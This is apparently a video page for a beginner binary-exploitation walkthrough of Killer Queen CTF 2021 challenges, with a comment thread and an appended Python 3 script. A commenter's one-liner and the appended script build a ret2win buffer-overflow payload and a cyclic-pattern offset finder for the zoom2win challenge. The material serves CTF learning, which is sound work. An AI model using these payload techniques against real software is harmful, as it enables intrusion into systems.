Binary Exploitation (Pwn) Challenge Walkthroughs - Killer Queen CTF 2021

  • Published 17 Jul 2024
  • Video walkthrough for Binary Exploitation (pwn) challenges from the Killer Queen 2021 Capture The Flag (CTF). We'll cover integer overflows, python sandbox escapes (pyjail), ret2win buffer overflow, stack variable overwrite and canary leak/bypass (including some PwnTools tricks). "Killer Queen CTF is a free cybersecurity learning program and set of competitions available to all around the world. It specializes in developing a tutorial platform and hosting competitions geared at making cybersecurity education open to all in a free and fun environment". Write-ups/tutorials aimed at beginners - Hope you enjoy 🙂
    ↢Social Media↣
    Twitter: / _cryptocat
    GitHub: github.com/Crypto-Cat
    HackTheBox: app.hackthebox.eu/profile/11897
    LinkedIn: / cryptocat
    Reddit: / _cryptocat23
    TH-cam: / cryptocat23
    Twitch: / cryptocat23
    ↢Killer Queen CTF↣
    www.killerqueenctf.org/
    2021.killerqueenctf.org/
    / discord
    ↢Resources↣
    Ghidra: ghidra.re/CheatSheet.html
    Volatility: github.com/volatilityfoundati...
    PwnTools: github.com/Gallopsled/pwntool...
    CyberChef: gchq.github.io/CyberChef/
    DCode: www.dcode.fr/en
    HackTricks: book.hacktricks.xyz/pentestin...
    CTF Tools: github.com/apsdehal/awesome-ctf
    Forensics: cugu.github.io/awesome-forens...
    Decompile Code: www.decompiler.com/
    Run Code: tio.run/
    ↢Chapters↣
    Start: 0:00
    Hammer To Fall: 0:16
    I want to break free: 5:08
    zoom2win: 11:47
    A Kind of Magic: 30:06
    TweetyBirb: 39:42
    End: 50:26
  • Science & Technology

Comments • 36

  • @_CryptoCat  2 years ago +9

    Audio is a little bit laggy/choppy at times, think the headset cable was loose 😑 hope it's bearable anyway ☺

  • @pliromatics2692 2 years ago +2

    I really admire the amount of effort you have put into this channel. You have inspired me to do something similar, but in Greek.
    I would like to thank you for this :)
    There are many guys out there who find CTFs a gigantic ice age, and this reduces their passion for cybersec. These videos are the absolute hands-on resources that can help them (and all of us, of course) learn how to approach CTF challenges and dive into the unknown.

    • @_CryptoCat  2 years ago

      thank you for the lovely feedback, appreciated! 🥰

  • @saketsrv9068 2 years ago +2

    That's love..pure love in these videos

  • @jorgevilla6523 2 years ago +3

    Wow, learned a lot! Thanks for doing the video! Audio was perfect for me

    • @_CryptoCat  2 years ago +1

      excellent! thanks 🥰

  • @coder_rc 2 years ago +2

    "Hang on, imma gonna crash" 😂

    • @_CryptoCat  2 years ago

      I can't remember which bit this is referring to specifically but it sounds about right 😂

  • @Kartikeyj96 2 years ago +4

    Crisp and clear explanation...👏👌 I thought you would also do the "brokencollegestudent" challenge. I got stuck on that one 😁

    • @_CryptoCat  2 years ago +1

      thanks mate 🥰 I really should have done brokencollegestudent, I ended up taking a look at some hack.lu challenges but they were hard 😆 worked on the new HTB machine "secret" in the end, it was really good, highly recommend!

    • @Kartikeyj96 2 years ago +1

      @_CryptoCat Thanks for the reply mate. Yeah, my team also did hack.lu challenges, which were really tough according to them. But unfortunately I was not able to contribute due to some reasons and I will definitely try the secret room from HTB🔥💯

    • @ItsDoros 2 years ago +1

      @Kartikeyj96 can you suggest the best resources for binary exploitation..?

  • @JoPraveen 2 years ago +2

    That's lit💥

  • @ThaRoboForm 2 years ago +2

    thanks for sharing the details of the hack. working perfectly fine with me

  • @ExplosionGamePlays 2 years ago +2

    Nice!

    • @_CryptoCat  2 years ago +1

      thanks mate 🥰

  • @Matt-ir1ky 2 years ago +2

    Nice bro. I quickly glanced at your vids and didn't see one, so just wondering...
    How do you set up that PS1 bash prompt like that? So sick. Thanks!

    • @_CryptoCat  2 years ago +1

      thanks mate! the PS1 style is just the default for Parrot OS, colours in terminal are: imgur.com/a/kcFR9id

    • @Matt-ir1ky 2 years ago +1

      @_CryptoCat ohh! Thanks for the reply!

  • @rvizx 2 years ago +3

    ❤️👏

  • @mukundbhuva 2 years ago +2

    Try some challenges from Bsides Ahmadabad ctf

    • @_CryptoCat  2 years ago +1

      my team has been looking at some of them but I'm gonna try and get a couple of videos for the HTB x Synack CTF this weekend 🙂

  • @0xgodson119 2 years ago +3

  • @arsen3223 2 years ago +2

    for zoom2win when I do:
    python2 -c 'print "A" *40 + "\x96\x11\x40\x00\x00\x00\x00\x00"' > payload
    then run ./zoom2win < payload it doesn't give me the flag.txt I created.
    Am I doing it wrong?

    • @_CryptoCat  2 years ago

      hmmm that looks correct to me 🤔 did you also try with pwntools script?

    • @arsen3223 2 years ago +1

      @_CryptoCat yeah I tried it with the template as well and it's the same thing, even on remote. I even did a for loop for the offset, and also did it with elf.symbols['flag'] but nothing seems to work

    • @_CryptoCat  2 years ago

      @arsen3223 hmmmm that's strange, does the binary run ok on its own? have you done any buffer overflow challenges on this machine/VM before? what about if you just run the binary and enter like 60 "A"s, does it segfault as expected?

    • @arsen3223 2 years ago +1

      @_CryptoCat it was an Ubuntu VM, but I also have this issue on WSL. It's weird, I'll try it on my laptop later

    • @_CryptoCat  2 years ago

      @arsen3223 cool, let me know! 😊

  • @IdanBanani 2 years ago +2

    Great videos & tips.
    37:34 - th-cam.com/video/FxNS-zSS7MQ/w-d-xo.html (LiveOverflow) - need to use sys.stdout instead.
    Finding the offset to overflow a variable could also be done by viewing the stack layout (double-click on the var name in IDA/Ghidra).
    There's also a canary command in pwndbg to show its value and location at runtime.

    • @_CryptoCat  2 years ago

      wow thanks for the info! the canary command will be extremely useful 🔥
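The zoom2win thread above (a 40-byte pad followed by the win function's address written out byte by byte) and the later tip about writing the payload through sys.stdout rather than print are the same ret2win recipe; the script below puts both into one Python 3 file. This is an added example, not code from the video or from either commenter. It assumes the offset (40) and win-function address (0x401196) that the commenter's bytes "\x96\x11\x40\x00..." encode, which also implies a non-PIE binary; the zoom2win binary itself is not included, so only payload construction and the pattern-based offset lookup run here. The optional ret_gadget address is a hypothetical value of your own choosing, not one taken from the challenge.

```python
"""Ret2win payload construction and crash-offset lookup in Python 3.

Added example (not from the video or the comment thread). Assumptions:
  - the saved return address sits 40 bytes into the buffer and the win
    function lives at 0x401196, the values spelled out by the commenter's
    python2 one-liner; the zoom2win binary is not part of this example.
  - ret_gadget, when given, is the address of a lone `ret` instruction,
    found by you, used to keep rsp 16-byte aligned when the win function
    calls into glibc (a frequent reason a textbook ret2win payload dies
    with a segfault inside the win function on newer distributions).
"""
import struct
import sys

OFFSET = 40          # assumed: bytes from the start of the buffer to the saved rip
WIN_ADDR = 0x401196  # assumed: address of the win/flag function (non-PIE)


def cyclic(length, alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4):
    """De Bruijn sequence over `alphabet`: every n-byte window occurs once,
    so the bytes that land in rip after a crash map back to exactly one
    offset. Same construction as pwntools' cyclic(); generated lazily and
    cut at `length` so large patterns stay cheap."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t, p):
        if len(out) >= length:
            return
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    if len(out) >= length:
                        return
                    out.append(alphabet[idx])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                if len(out) >= length:
                    return
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out)


def cyclic_find(value, max_len=4096):
    """Offset of `value` within the pattern, or -1 if absent. `value` may be
    raw bytes or the integer read from rip/rsp in the debugger after sending
    cyclic(max_len) as input; 64-bit values are packed as 8 bytes."""
    if isinstance(value, int):
        width = "<Q" if value > 0xFFFFFFFF else "<I"
        value = struct.pack(width, value)
    return cyclic(max_len).find(value)


def ret2win_payload(offset=OFFSET, win=WIN_ADDR, ret_gadget=None):
    """Padding up to the saved return address, then the win address packed as
    a little-endian 64-bit pointer (the bytes the python2 one-liner in the
    thread writes by hand). An optional `ret` gadget is slotted in first so
    the win function starts with an aligned stack."""
    payload = b"A" * offset
    if ret_gadget is not None:
        payload += struct.pack("<Q", ret_gadget)  # one extra `ret` realigns rsp
    return payload + struct.pack("<Q", win)


if __name__ == "__main__":
    # Emit raw bytes. Python 3's print() writes text and would mangle the
    # address bytes, which is the sys.stdout point raised in the thread.
    sys.stdout.buffer.write(ret2win_payload())
```

Usage: `python3 exploit.py > payload && ./zoom2win < payload`. If the process segfaults before printing the flag even though the offset is right, send `cyclic(100)` as input, read the faulting rip (or the value at rsp) from the debugger, confirm `cyclic_find()` still returns 40, then retry with `ret_gadget=` set to a `ret` address from `objdump -d zoom2win | grep -w ret` (or `ROP(elf).find_gadget(['ret'])` in pwntools); stack misalignment inside the win function is one possible cause of that symptom, not a diagnosis of the commenter's setup.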